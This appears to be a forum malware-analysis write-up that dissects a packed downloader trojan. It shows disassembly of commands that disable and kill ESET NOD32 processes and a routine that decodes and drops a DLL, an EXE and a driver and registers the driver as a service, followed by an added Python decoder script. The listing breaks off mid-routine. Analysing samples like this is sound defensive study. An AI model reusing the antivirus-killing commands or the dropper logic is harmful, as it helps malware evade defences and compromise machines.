[File]: 1.v (the extension was changed to .v so the sample cannot be run by accident; rename it back to .exe to run it)
[Title]: Analysis of a downloader
[Author]: willjhw
[Author e-mail]: 466684954@qq.com
[Trojan name]: 1.v
[Download]: see attachment
[Analysis environment]: Windows XP SP3
[Tools]: OD, PEiD
[Details]:
Since I need to prepare for an internship, I asked my boss for a sample to analyse and practise on. I am a beginner and there is a lot I do not know yet, so please point out anything I got wrong.
As usual, check for a packer with PEiD first (PEiD screenshot not included here).
It is UPX, a plain compression packer, so the ESP trick unpacks it: set a hardware breakpoint on the stack slot written by the initial pushad, which breaks right after the matching popad, then follow the jump to the OEP. After unpacking, make it a habit to rebuild the import table before doing anything else. Then load the unpacked dump into OD and start reading.
00401F09 6A 00 push 0x0
00401F0B 68 50114000 push dump_.00401150 ; ASCII "notepad.exe"
00401F10 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
00401F16 68 C8000000 push 0xC8
00401F1B FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
00401F21 6A 00 push 0x0
00401F23 68 48114000 push dump_.00401148 ; ASCII "Notepad"
00401F28 FF15 B0104000 call dword ptr ds:[<&user32.FindWindowA>>; user32.FindWindowA
00401F2E 85C0 test eax,eax
00401F30 74 10 je Xdump_.00401F42
00401F32 6A 00 push 0x0
00401F34 6A 00 push 0x0
00401F36 6A 10 push 0x10
00401F38 50 push eax
00401F39 FF15 B4104000 call dword ptr ds:[<&user32.SendMessageA>; user32.SendMessageA
00401F3F 33C0 xor eax,eax
00401F41 C3 retn
Oddly, it launches notepad.exe with WinExec, sleeps 200 ms (0xC8), looks for a window of class "Notepad" with FindWindowA and, if one is found, sends it WM_CLOSE (0x10) through SendMessageA and returns 0; if no Notepad window is found it takes the jump at 00401F30 and exits itself (I don't understand why it does this; maybe a check for antivirus? anti-VM? maybe).
00401D5A 83C4 0C add esp,0xC
00401D5D 8D85 B0FEFFFF lea eax,dword ptr ss:[ebp-0x150]
00401D63 50 push eax
00401D64 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401D6A 50 push eax
00401D6B FF15 50104000 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00401D71 8D85 A8FEFFFF lea eax,dword ptr ss:[ebp-0x158]
00401D77 50 push eax
00401D78 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401D7E 50 push eax
00401D7F FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401D85 8D85 94FEFFFF lea eax,dword ptr ss:[ebp-0x16C]
00401D8B 50 push eax
00401D8C 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401D92 50 push eax
00401D93 FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401D99 6A 00 push 0x0
00401D9B 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401DA1 50 push eax
00401DA2 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
The WinExec above runs cmd /c sc config ekrn start= disabled, which sets the NOD32 (ESET) service ekrn to disabled. The command line is assembled on the stack at run time: lstrcpyA copies the first fragment into the buffer at ebp-0x12C and two lstrcatA calls append the rest, so the complete string never appears in the binary and only shows up in the debugger once it has been built.
00401DE2 68 88130000 push 0x1388
00401DE7 FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
00401DED 8D45 D4 lea eax,dword ptr ss:[ebp-0x2C]
00401DF0 50 push eax
00401DF1 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401DF7 50 push eax
00401DF8 FF15 50104000 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00401DFE 8D45 F4 lea eax,dword ptr ss:[ebp-0xC]
00401E01 50 push eax
00401E02 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E08 50 push eax
00401E09 FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401E0F 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130]
00401E15 50 push eax
00401E16 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E1C 50 push eax
00401E1D FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401E23 6A 00 push 0x0
00401E25 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E2B 50 push eax
00401E2C FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
After a Sleep of 5 s (0x1388) the same lstrcpy/lstrcat pattern builds cmd.exe /c taskkill.exe /im ekrn.exe /f and runs it through WinExec, forcibly killing the NOD32 service process.
00401E6C 68 88130000 push 0x1388
00401E71 FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
00401E77 8D45 D4 lea eax,dword ptr ss:[ebp-0x2C]
00401E7A 50 push eax
00401E7B 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E81 50 push eax
00401E82 FF15 50104000 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00401E88 8D85 C4FEFFFF lea eax,dword ptr ss:[ebp-0x13C]
00401E8E 50 push eax
00401E8F 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E95 50 push eax
00401E96 FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401E9C 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130]
00401EA2 50 push eax
00401EA3 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401EA9 50 push eax
00401EAA FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401EB0 6A 00 push 0x0
00401EB2 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401EB8 50 push eax
00401EB9 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
Another 5 s Sleep, then WinExec runs cmd.exe /c taskkill.exe /im egui.exe /f, killing the NOD32 GUI process. This trojan clearly has it in for NOD32: it shuts the whole product down.
0040145A 6A 00 push 0x0
0040145C 6A 00 push 0x0
0040145E 6A 02 push 0x2
00401460 6A 00 push 0x0
00401462 6A 00 push 0x0
00401464 68 00000040 push 0x40000000
00401469 FF75 08 push dword ptr ss:[ebp+0x8]
0040146C FF15 1C104000 call dword ptr ds:[<&kernel32.CreateFile>; kernel32.CreateFileA
00401472 8945 F0 mov dword ptr ss:[ebp-0x10],eax
00401475 8B45 F0 mov eax,dword ptr ss:[ebp-0x10]
00401478 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040147B 837D F0 00 cmp dword ptr ss:[ebp-0x10],0x0
0040147F 0F84 9D000000 je dump_.00401522
00401485 FF75 10 push dword ptr ss:[ebp+0x10]
00401488 FF75 0C push dword ptr ss:[ebp+0xC]
0040148B 6A 00 push 0x0
0040148D FF15 18104000 call dword ptr ds:[<&kernel32.FindResour>; kernel32.FindResourceA
00401493 8945 E8 mov dword ptr ss:[ebp-0x18],eax
00401496 8B45 E8 mov eax,dword ptr ss:[ebp-0x18]
00401499 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
0040149C FF75 E8 push dword ptr ss:[ebp-0x18]
0040149F 6A 00 push 0x0
004014A1 FF15 14104000 call dword ptr ds:[<&kernel32.LoadResour>; kernel32.LoadResource
004014A7 8945 DC mov dword ptr ss:[ebp-0x24],eax
004014AA 8B45 DC mov eax,dword ptr ss:[ebp-0x24]
004014AD 8945 F8 mov dword ptr ss:[ebp-0x8],eax
004014B0 8365 D8 00 and dword ptr ss:[ebp-0x28],0x0
004014B4 FF75 DC push dword ptr ss:[ebp-0x24]
004014B7 FF15 10104000 call dword ptr ds:[<&kernel32.LockResour>; kernel32.SetHandleCount
004014BD 8945 EC mov dword ptr ss:[ebp-0x14],eax
004014C0 8065 FC 00 and byte ptr ss:[ebp-0x4],0x0
004014C4 90 nop
004014C5 FF75 E4 push dword ptr ss:[ebp-0x1C]
004014C8 6A 00 push 0x0
004014CA FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; kernel32.SizeofResource
004014D0 85C0 test eax,eax
004014D2 74 3C je Xdump_.00401510
004014D4 90 nop
004014D5 8B45 EC mov eax,dword ptr ss:[ebp-0x14]
004014D8 0345 D8 add eax,dword ptr ss:[ebp-0x28]
004014DB 0FB600 movzx eax,byte ptr ds:[eax]
004014DE 83C0 05 add eax,0x5
004014E1 8845 FC mov byte ptr ss:[ebp-0x4],al
004014E4 6A 00 push 0x0
004014E6 8D45 E0 lea eax,dword ptr ss:[ebp-0x20]
004014E9 50 push eax
004014EA 6A 01 push 0x1
004014EC 8D45 FC lea eax,dword ptr ss:[ebp-0x4]
004014EF 50 push eax
004014F0 FF75 F4 push dword ptr ss:[ebp-0xC]
004014F3 FF15 08104000 call dword ptr ds:[<&kernel32.WriteFile>>; kernel32.WriteFile
004014F9 8B45 D8 mov eax,dword ptr ss:[ebp-0x28]
004014FC 40 inc eax
004014FD 8945 D8 mov dword ptr ss:[ebp-0x28],eax
00401500 FF75 E4 push dword ptr ss:[ebp-0x1C]
00401503 6A 00 push 0x0
00401505 FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; kernel32.SizeofResource
0040150B 3945 D8 cmp dword ptr ss:[ebp-0x28],eax
0040150E ^ 72 C5 jb Xdump_.004014D5
00401510 FF75 F8 push dword ptr ss:[ebp-0x8]
00401513 FF15 04104000 call dword ptr ds:[<&kernel32.FreeResour>; kernel32.FreeResource
00401519 FF75 F4 push dword ptr ss:[ebp-0xC]
0040151C FF15 00104000 call dword ptr ds:[<&kernel32.CloseHandl>; kernel32.CloseHandle
This is the file-drop routine. CreateFileA opens the path passed in [ebp+0x8] with GENERIC_WRITE and CREATE_ALWAYS; FindResourceA/LoadResource/LockResource fetch the resource named by [ebp+0xC] and [ebp+0x10] (OD labels the thunk at 0x401010 SetHandleCount in its comment, but the import is LockResource and its return value is used as the resource pointer); then the loop at 004014D5 reads one resource byte, adds 5, and writes that single byte with WriteFile, repeating until the counter reaches SizeofResource. In other words, each embedded payload is stored with every byte decremented by 5. Here it drops tete8969843t.dll into C:\WINDOWS; grab a copy now in case it gets deleted later.
00402308 6A 05 push 0x5
0040230A 8D85 30F6FFFF lea eax,dword ptr ss:[ebp-0x9D0]
00402310 50 push eax
00402311 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
WinExec then runs Rundll32.exe to load the just-dropped tete8969843t.dll (nCmdShow = 5, SW_SHOW).
00402351 68 50460000 push 0x4650
00402356 FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
0040235C 68 E8030000 push 0x3E8
00402361 FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
00402367 8D85 D8FCFFFF lea eax,dword ptr ss:[ebp-0x328]
0040236D 50 push eax
0040236E FF15 24104000 call dword ptr ds:[<&kernel32.DeleteFile>; kernel32.DeleteFileA
After two Sleeps (0x4650 = 18 s, then 0x3E8 = 1 s) it calls DeleteFileA to remove the DLL; good thing we already saved a copy.
0040145A 6A 00 push 0x0
0040145C 6A 00 push 0x0
0040145E 6A 02 push 0x2
00401460 6A 00 push 0x0
00401462 6A 00 push 0x0
00401464 68 00000040 push 0x40000000
00401469 FF75 08 push dword ptr ss:[ebp+0x8]
0040146C FF15 1C104000 call dword ptr ds:[<&kernel32.CreateFile>; kernel32.CreateFileA
00401472 8945 F0 mov dword ptr ss:[ebp-0x10],eax
00401475 8B45 F0 mov eax,dword ptr ss:[ebp-0x10]
00401478 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040147B 837D F0 00 cmp dword ptr ss:[ebp-0x10],0x0
0040147F 0F84 9D000000 je dump_.00401522
00401485 FF75 10 push dword ptr ss:[ebp+0x10]
00401488 FF75 0C push dword ptr ss:[ebp+0xC]
0040148B 6A 00 push 0x0
0040148D FF15 18104000 call dword ptr ds:[<&kernel32.FindResour>; kernel32.FindResourceA
00401493 8945 E8 mov dword ptr ss:[ebp-0x18],eax
00401496 8B45 E8 mov eax,dword ptr ss:[ebp-0x18]
00401499 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
0040149C FF75 E8 push dword ptr ss:[ebp-0x18]
0040149F 6A 00 push 0x0
004014A1 FF15 14104000 call dword ptr ds:[<&kernel32.LoadResour>; kernel32.LoadResource
004014A7 8945 DC mov dword ptr ss:[ebp-0x24],eax
004014AA 8B45 DC mov eax,dword ptr ss:[ebp-0x24]
004014AD 8945 F8 mov dword ptr ss:[ebp-0x8],eax
004014B0 8365 D8 00 and dword ptr ss:[ebp-0x28],0x0
004014B4 FF75 DC push dword ptr ss:[ebp-0x24]
004014B7 FF15 10104000 call dword ptr ds:[<&kernel32.LockResour>; kernel32.SetHandleCount
004014BD 8945 EC mov dword ptr ss:[ebp-0x14],eax
004014C0 8065 FC 00 and byte ptr ss:[ebp-0x4],0x0
004014C4 90 nop
004014C5 FF75 E4 push dword ptr ss:[ebp-0x1C]
004014C8 6A 00 push 0x0
004014CA FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; kernel32.SizeofResource
004014D0 85C0 test eax,eax
004014D2 74 3C je Xdump_.00401510
004014D4 90 nop
004014D5 8B45 EC mov eax,dword ptr ss:[ebp-0x14]
004014D8 0345 D8 add eax,dword ptr ss:[ebp-0x28]
004014DB 0FB600 movzx eax,byte ptr ds:[eax]
004014DE 83C0 05 add eax,0x5
004014E1 8845 FC mov byte ptr ss:[ebp-0x4],al
004014E4 6A 00 push 0x0
004014E6 8D45 E0 lea eax,dword ptr ss:[ebp-0x20]
004014E9 50 push eax
004014EA 6A 01 push 0x1
004014EC 8D45 FC lea eax,dword ptr ss:[ebp-0x4]
004014EF 50 push eax
004014F0 FF75 F4 push dword ptr ss:[ebp-0xC]
004014F3 FF15 08104000 call dword ptr ds:[<&kernel32.WriteFile>>; kernel32.WriteFile
004014F9 8B45 D8 mov eax,dword ptr ss:[ebp-0x28]
004014FC 40 inc eax
004014FD 8945 D8 mov dword ptr ss:[ebp-0x28],eax
00401500 FF75 E4 push dword ptr ss:[ebp-0x1C]
00401503 6A 00 push 0x0
00401505 FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; kernel32.SizeofResource
0040150B 3945 D8 cmp dword ptr ss:[ebp-0x28],eax
0040150E ^ 72 C5 jb Xdump_.004014D5
00401510 FF75 F8 push dword ptr ss:[ebp-0x8]
00401513 FF15 04104000 call dword ptr ds:[<&kernel32.FreeResour>; kernel32.FreeResource
00401519 FF75 F4 push dword ptr ss:[ebp-0xC]
0040151C FF15 00104000 call dword ptr ds:[<&kernel32.CloseHandl>; kernel32.CloseHandle
The same drop routine runs again, this time writing extext9393312t.exe to C:\WINDOWS; grab that one too.
00402448 6A 00 push 0x0
0040244A 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-0x218]
00402450 50 push eax
00402451 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
WinExec runs the just-dropped extext9393312t.exe (nCmdShow = 0, SW_HIDE).
00402869 . 50 push eax ; /FileName
0040286A . FF15 70104000 call dword ptr ds:[<&kernel32.LoadLibrar>; \LoadLibraryA
It loads advapi32.dll with LoadLibraryA. advapi32 exports both the registry and the service control manager APIs; as the GetProcAddress calls that follow show, what this trojan resolves from it are the SCM functions, and it stores each pointer in a table at 0x4010C8-0x4010DC for later use.
004028B6 . 50 push eax ; /ProcNameOrOrdinal
004028B7 . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
004028BD . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
004028C3 . A3 DC104000 mov dword ptr ds:[0x4010DC],eax
004028C8 . 8D85 8CF9FFFF lea eax,dword ptr ss:[ebp-0x674]
004028CE . 50 push eax ; /ProcNameOrOrdinal
004028CF . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
004028D5 . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
004028DB . A3 D8104000 mov dword ptr ds:[0x4010D8],eax
004028E0 . 8D85 C8FAFFFF lea eax,dword ptr ss:[ebp-0x538]
004028E6 . 50 push eax ; /ProcNameOrOrdinal
004028E7 . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
004028ED . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
004028F3 . A3 D4104000 mov dword ptr ds:[0x4010D4],eax
004028F8 . 8D85 C0F2FFFF lea eax,dword ptr ss:[ebp-0xD40]
004028FE . 50 push eax ; /ProcNameOrOrdinal
004028FF . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
00402905 . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
0040290B . A3 D0104000 mov dword ptr ds:[0x4010D0],eax
00402910 . 8D85 58F8FFFF lea eax,dword ptr ss:[ebp-0x7A8]
00402916 . 50 push eax ; /ProcNameOrOrdinal
00402917 . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
0040291D . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
00402923 . A3 CC104000 mov dword ptr ds:[0x4010CC],eax
00402928 . 8D85 34F7FFFF lea eax,dword ptr ss:[ebp-0x8CC]
0040292E . 50 push eax ; /ProcNameOrOrdinal
0040292F . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
00402935 . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
0040293B . A3 C8104000 mov dword ptr ds:[0x4010C8],eax
00402940 . 8D85 68F8FFFF lea eax,dword ptr ss:[ebp-0x798]
00402946 . 50 push eax ; /ProcNameOrOrdinal
00402947 . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
0040294D . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
All of these resolve service-related functions (OpenServiceA, ControlService, CreateServiceA, CloseServiceHandle, DeleteService and StartServiceA, as the later calls through that table show).
00402A08 . 50 push eax ; /FileName
00402A09 . FF15 70104000 call dword ptr ds:[<&kernel32.LoadLibrar>; \LoadLibraryA
00402A0F . 8985 88F8FFFF mov dword ptr ss:[ebp-0x778],eax
00402A15 . 8D85 78F8FFFF lea eax,dword ptr ss:[ebp-0x788]
00402A1B . 50 push eax ; /ProcNameOrOrdinal
00402A1C . FFB5 88F8FFFF push dword ptr ss:[ebp-0x778] ; |hModule
00402A22 . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
It loads kernel32.dll and resolves DeviceIoControl, which means it will be sending requests to a driver; this ties in with the service setup above.
00401459 . 61 popad
0040145A . 6A 00 push 0x0 ; /hTemplateFile = NULL
0040145C . 6A 00 push 0x0 ; |Attributes = 0
0040145E . 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401460 . 6A 00 push 0x0 ; |pSecurity = NULL
00401462 . 6A 00 push 0x0 ; |ShareMode = 0
00401464 . 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
00401469 . FF75 08 push dword ptr ss:[ebp+0x8] ; |FileName
0040146C . FF15 1C104000 call dword ptr ds:[<&kernel32.CreateFile>; \CreateFileA
00401472 . 8945 F0 mov dword ptr ss:[ebp-0x10],eax
00401475 . 8B45 F0 mov eax,dword ptr ss:[ebp-0x10]
00401478 . 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040147B . 837D F0 00 cmp dword ptr ss:[ebp-0x10],0x0
0040147F . 0F84 9D000000 je dump_.00401522
00401485 . FF75 10 push dword ptr ss:[ebp+0x10] ; /ResourceType
00401488 . FF75 0C push dword ptr ss:[ebp+0xC] ; |ResourceName
0040148B . 6A 00 push 0x0 ; |hModule = NULL
0040148D . FF15 18104000 call dword ptr ds:[<&kernel32.FindResour>; \FindResourceA
00401493 . 8945 E8 mov dword ptr ss:[ebp-0x18],eax
00401496 . 8B45 E8 mov eax,dword ptr ss:[ebp-0x18]
00401499 . 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
0040149C . FF75 E8 push dword ptr ss:[ebp-0x18] ; /hResource
0040149F . 6A 00 push 0x0 ; |hModule = NULL
004014A1 . FF15 14104000 call dword ptr ds:[<&kernel32.LoadResour>; \LoadResource
004014A7 . 8945 DC mov dword ptr ss:[ebp-0x24],eax
004014AA . 8B45 DC mov eax,dword ptr ss:[ebp-0x24]
004014AD . 8945 F8 mov dword ptr ss:[ebp-0x8],eax
004014B0 . 8365 D8 00 and dword ptr ss:[ebp-0x28],0x0
004014B4 . FF75 DC push dword ptr ss:[ebp-0x24] ; /nHandles
004014B7 . FF15 10104000 call dword ptr ds:[<&kernel32.LockResour>; \SetHandleCount
004014BD . 8945 EC mov dword ptr ss:[ebp-0x14],eax
004014C0 . 8065 FC 00 and byte ptr ss:[ebp-0x4],0x0
004014C4 . 90 nop
004014C5 . FF75 E4 push dword ptr ss:[ebp-0x1C] ; /hResource
004014C8 . 6A 00 push 0x0 ; |hModule = NULL
004014CA . FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; \SizeofResource
004014D0 . 85C0 test eax,eax
004014D2 . 74 3C je Xdump_.00401510
004014D4 . 90 nop
004014D5 > 8B45 EC mov eax,dword ptr ss:[ebp-0x14]
004014D8 . 0345 D8 add eax,dword ptr ss:[ebp-0x28]
004014DB . 0FB600 movzx eax,byte ptr ds:[eax]
004014DE . 83C0 05 add eax,0x5
004014E1 . 8845 FC mov byte ptr ss:[ebp-0x4],al
004014E4 . 6A 00 push 0x0 ; /pOverlapped = NULL
004014E6 . 8D45 E0 lea eax,dword ptr ss:[ebp-0x20] ; |
004014E9 . 50 push eax ; |pBytesWritten
004014EA . 6A 01 push 0x1 ; |nBytesToWrite = 1
004014EC . 8D45 FC lea eax,dword ptr ss:[ebp-0x4] ; |
004014EF . 50 push eax ; |Buffer
004014F0 . FF75 F4 push dword ptr ss:[ebp-0xC] ; |hFile
004014F3 . FF15 08104000 call dword ptr ds:[<&kernel32.WriteFile>>; \WriteFile
004014F9 . 8B45 D8 mov eax,dword ptr ss:[ebp-0x28]
004014FC . 40 inc eax
004014FD . 8945 D8 mov dword ptr ss:[ebp-0x28],eax
00401500 . FF75 E4 push dword ptr ss:[ebp-0x1C] ; /hResource
00401503 . 6A 00 push 0x0 ; |hModule = NULL
00401505 . FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; \SizeofResource
0040150B . 3945 D8 cmp dword ptr ss:[ebp-0x28],eax
0040150E .^ 72 C5 jb Xdump_.004014D5
00401510 > FF75 F8 push dword ptr ss:[ebp-0x8] ; /hResource
00401513 . FF15 04104000 call dword ptr ds:[<&kernel32.FreeResour>; \FreeResource
00401519 . FF75 F4 push dword ptr ss:[ebp-0xC] ; /hObject
0040151C . FF15 00104000 call dword ptr ds:[<&kernel32.CloseHandl>; \CloseHandle
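The payloads written out by the routine at 0040145A can be recovered statically instead of being caught on disk at run time. The following Python script is an added example, not code from the original post: it re-implements the loop at 004014D5 (each resource byte plus 5, written one byte at a time) as a decoder and, because the resource type and name passed in [ebp+0xC]/[ebp+0x10] are not shown on the page, it locates candidate payloads by scanning the unpacked dump for a +5-encoded PE header ("HU" where "MZ" should be, with a matching "PE\0\0" at e_lfanew) rather than walking the resource directory. The container bytes used in its self-check are constructed test data, not bytes from the sample.

```python
"""Static decoder for the payloads dropped by the routine at 0040145A (added example).

The loop at 004014D5 writes each resource byte + 5, so the embedded files are
stored with every byte decremented by 5.  The resource name/type are not on
the page, so find_encoded_pes() scans a raw dump for an encoded PE header
instead of walking the resource directory.  build_fake_container() returns
constructed test data, not bytes from the sample."""
import struct

KEY = 5  # the "add eax,0x5" at 004014DE


def decode_dropped(data):
    """Exactly what the WriteFile loop produces: (byte + 5) & 0xFF."""
    return bytes((b + KEY) & 0xFF for b in data)


def encode_for_resource(data):
    """Inverse: how a payload looks while it sits in the .rsrc section."""
    return bytes((b - KEY) & 0xFF for b in data)


def looks_like_encoded_pe(blob, off):
    """Decoded bytes at off start with 'MZ' and e_lfanew points at 'PE\\0\\0'."""
    if blob[off:off + 2] != encode_for_resource(b"MZ") or off + 0x40 > len(blob):
        return False
    e_lfanew = struct.unpack_from("<I", decode_dropped(blob[off:off + 0x40]), 0x3C)[0]
    pe = off + e_lfanew
    if e_lfanew < 0x40 or pe + 4 > len(blob):
        return False
    return decode_dropped(blob[pe:pe + 4]) == b"PE\x00\x00"


def find_encoded_pes(blob):
    """File offsets of every +5-encoded PE image inside a raw dump."""
    marker = encode_for_resource(b"MZ")  # b"HU": the bytes to grep for in the dump
    hits, off = [], blob.find(marker)
    while off != -1:
        if looks_like_encoded_pe(blob, off):
            hits.append(off)
        off = blob.find(marker, off + 1)
    return hits


def extract(blob, off, size):
    """Decode `size` bytes at `off`; size is what SizeofResource returned."""
    return decode_dropped(blob[off:off + size])


def build_fake_pe():
    """Constructed stand-in for a dropped file: MZ, e_lfanew = 0x40, PE signature, body."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\x00\x00\x4c\x01" + b"dropped payload body"


def build_fake_container():
    """Constructed 'dump': junk with a decoy 'HU', the encoded payload, more junk."""
    payload = build_fake_pe()
    before = b"HU is not a PE " + bytes(range(0x40))
    container = before + encode_for_resource(payload) + b"\x90" * 16
    return container, len(before), len(payload)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_fake_container()[0]
    for off in find_encoded_pes(blob):
        # Without the resource size we can only decode to end of file; trim by hand.
        out = "dropped_%08x.bin" % off
        with open(out, "wb") as fh:
            fh.write(extract(blob, off, len(blob) - off))
        print("encoded PE header at file offset 0x%08x -> %s" % (off, out))
```

Run it against the unpacked dump (python3 decode_drops.py dump_.exe) and it reports every offset whose decoded bytes form a plausible PE header; the hit count should match the three drops seen in the debugger. The decoded output runs to end of file, so cut it at the size SizeofResource returned (or at the next resource) to get the exact DLL, EXE and SYS.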
The drop routine runs a third time, this time writing a driver, pcidump.sys, to C:\WINDOWS\system32\drivers.
00401597 . 6A 00 push 0x0
00401599 . 6A 00 push 0x0
0040159B . 6A 00 push 0x0
0040159D . 6A 00 push 0x0
0040159F . 6A 00 push 0x0
004015A1 . FF75 08 push dword ptr ss:[ebp+0x8]
004015A4 . 6A 00 push 0x0
004015A6 . 6A 03 push 0x3
004015A8 . 6A 01 push 0x1
004015AA . 68 FF010F00 push 0xF01FF
004015AF . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
004015B4 . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
004015B9 . FF75 FC push dword ptr ss:[ebp-0x4]
004015BC . FF15 D4104000 call dword ptr ds:[0x4010D4] ; advapi32.CreateServiceA
004015C2 . 8945 C8 mov dword ptr ss:[ebp-0x38],eax
004015C5 . 837D C8 00 cmp dword ptr ss:[ebp-0x38],0x0
004015C9 . 75 79 jnz Xdump_.00401644
004015CB . 68 FF010F00 push 0xF01FF
004015D0 . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
004015D5 . FF75 F4 push dword ptr ss:[ebp-0xC]
004015D8 . FF15 DC104000 call dword ptr ds:[0x4010DC] ; advapi32.OpenServiceA
004015DE . 8945 D4 mov dword ptr ss:[ebp-0x2C],eax
004015E1 . 8B45 D4 mov eax,dword ptr ss:[ebp-0x2C]
004015E4 . 8945 F8 mov dword ptr ss:[ebp-0x8],eax
004015E7 . 837D D4 00 cmp dword ptr ss:[ebp-0x2C],0x0
004015EB . 74 21 je Xdump_.0040160E
004015ED . 8D45 D8 lea eax,dword ptr ss:[ebp-0x28]
004015F0 . 50 push eax
004015F1 . 6A 01 push 0x1
004015F3 . FF75 D4 push dword ptr ss:[ebp-0x2C]
004015F6 . FF15 D8104000 call dword ptr ds:[0x4010D8] ; advapi32.ControlService
004015FC . FF75 F8 push dword ptr ss:[ebp-0x8]
004015FF . FF15 CC104000 call dword ptr ds:[0x4010CC] ; advapi32.DeleteService
00401605 . FF75 F8 push dword ptr ss:[ebp-0x8]
00401608 . FF15 D0104000 call dword ptr ds:[0x4010D0] ; advapi32.CloseServiceHandle
0040160E > 6A 00 push 0x0
00401610 . 6A 00 push 0x0
00401612 . 6A 00 push 0x0
00401614 . 6A 00 push 0x0
00401616 . 6A 00 push 0x0
00401618 . FF75 08 push dword ptr ss:[ebp+0x8]
0040161B . 6A 00 push 0x0
0040161D . 6A 03 push 0x3
0040161F . 6A 01 push 0x1
00401621 . 68 FF010F00 push 0xF01FF
00401626 . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
0040162B . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
00401630 . FF75 F4 push dword ptr ss:[ebp-0xC]
00401633 . FF15 D4104000 call dword ptr ds:[0x4010D4] ; advapi32.CreateServiceA
00401639 . 8945 C8 mov dword ptr ss:[ebp-0x38],eax
0040163C . 837D C8 00 cmp dword ptr ss:[ebp-0x38],0x0
00401640 . 75 02 jnz Xdump_.00401644
00401642 . EB 6F jmp Xdump_.004016B3
00401644 > FF75 C8 push dword ptr ss:[ebp-0x38]
00401647 . FF15 D0104000 call dword ptr ds:[0x4010D0] ; advapi32.CloseServiceHandle
0040164D . 6A 10 push 0x10
0040164F . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
